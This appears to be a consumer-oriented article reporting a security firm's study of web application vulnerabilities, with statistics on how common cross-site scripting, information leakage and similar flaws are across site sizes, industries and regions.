Today, getting on the Internet is a way of life. It is estimated that around a third of the world’s 7 billion people use the Internet, according to the ITU World Telecommunication in 2011.
It is safe to say that a majority of us are familiar with the Internet and the World Wide Web. In fact, we would not think twice about clicking on a link and then just using, reading or visiting a Web site. Some even download stuff from them. But should we be this complacent and trusting? Should we trust the Web sites we visit?
Not if we know just how unsafe the Web really is.
A recent study conducted by iViZSecurity, a cloud-based application penetration testing company, reveals that you should probably not trust websites too much. iViz should know. The IDG Ventures-funded company found more than 30 zero day vulnerabilities, which earned them industry wide recognition and the trust of more than 300 customers.
Using a sample from their customers, they conducted more than 5,000 applications. The sample included apps from Asia (25% of the apps were from here), the United States (40%) and Europe (25%).
Figure 1: Average Number of Vulnerabilities on Large, Medium and Small Websites
What they found was that close to all (99%!!!) apps that they have tested had at least one vulnerability. Out of these, more than 8 out of 10 of these apps had at least 1 critical vulnerability, while there are more or less 35 vulnerabilities present on an average website. What all of these mean is that almost all Web sites are open to hacking attacks.
You might be thinking, surely none of your trusted programs and apps would want their websites to be hacked, because at the very least it would cause them to lose customers and would be a big PR nightmare. You might be wrong on this one too. While every business and Webmaster would say that they work hard on securing their sites, there is actually a very low correlation between security and compliance.
Just to give you an idea, if you surf retailer sites and buying from there, you just might become a victim of hacking. This would probably be due to cross-site scripting, or more simply badly written code in Web applications that attackers can exploit to collect data from you or send you malicious content.
Figure 2: Average Number of Vulnerabilities per Application by Industry Verticals
According to the study, the most security-exposed industries include the retail, education, IT, healthcare, telecommunications, manufacturing and BFSI. The first two industries alone have an average of 56 and 51 vulnerabilities per application, respectively.
So how are users lulled into a false sense of security? This is partly because nine out of ten hacking attacks are not made public!
Are you safe?
Another reason is that the ordinary user might be aware of the problem or the threat but thinks that this might be a problem with small sites with no regards to security.
Figure 3: Average Number of Vulnerabilities on High Security, Average Security and Below Average Security Websites
While it is true that high security sites have lesser vulnerabilities on the average, they still have an average of 22 vulnerabilities that hackers could exploit. In contrast, those with average security and below average security have an average of 41 and 81 vulnerabilities, respectively.
Larger Web sites also tend to have a higher incidence of vulnerability, averaging around 78 vulnerabilities. Medium sites have 35 vulnerabilities while small Web sites have 26 on the average.
Figure 4: Percentage of Websites Containing the “Type of Vulnerability”
What are these vulnerabilities? Apart from the cross-site scripting we’ve already mentioned that accounts for 65% of all vulnerabilities found in the study, the most prevalent vulnerabilities are:
- Information leakage (51%)
- Content spoofing (31%)
- Insufficient authorization (26%)
- Cross-site request forgery (25%)
Figure 5: Average Number of Vulnerabilities per Application by Geography
Out of the Web applications tested, it would appear that you are most in danger when visiting Web sites from Asia and the Middle East, with close to 50 vulnerabilities found per application on the average. But Web applications from Europe and the United States are not much better with 37 and 33 vulnerabilities found from each region on the average.